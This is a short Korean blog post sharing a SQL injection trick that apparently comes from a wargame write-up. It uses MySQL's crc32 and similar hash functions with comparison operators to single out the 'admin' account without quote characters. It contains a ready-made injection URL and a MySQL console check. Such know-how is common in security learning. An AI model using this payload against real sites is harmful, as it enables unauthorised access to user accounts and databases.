sqli tips

SQLi TIPS

- H3X0R, s1ipper 팀 소속 윤석찬(ch4n3) -

---

솔직히 제가 그렇게 대단한 웹해커는 아니라서 유용한 팁일줄은 모르겠으나 한 번 공유해봅니다. 

현재 제가 운영하고 있는 ch4n3 world(http://ch4n3.dothome.co.kr/) write up을 보다가 알게 된 것인데, mysql의 암호화 함수를 많이 사용하면 좋다는 것입니다. 

--

http://chaneyoon.dothome.co.kr/sqli2.php?id=1%5C&pw=))||crc32(id)%3E2282622325%26%26crc32(id)%3C2282622327%23

--

위에 있는 url은 crc32를 이용한 암호화로 id가 admin인 계정을 찾는 것입니다. 

대표적인 암호화로는 md serises , sha serises, base serises 이렇게  있을텐데 이것들을 <, > 비교 연산자와 이용하면 될 것 같습니다. 

mysql> select crc32(0x61646D696E)=2282622326;

+--------------------------------+

| crc32(0x61646D696E)=2282622326 |

+--------------------------------+

|                              1 |

+--------------------------------+

1 row in set (0.00 sec)

이렇게 하면 admin값을 찾을 때, 쿼터를 필요로하지 않습니다. 

네, 일단 스쳐가는 영감을 적었구여 내일 개학이라서 자도록 하겠습니다.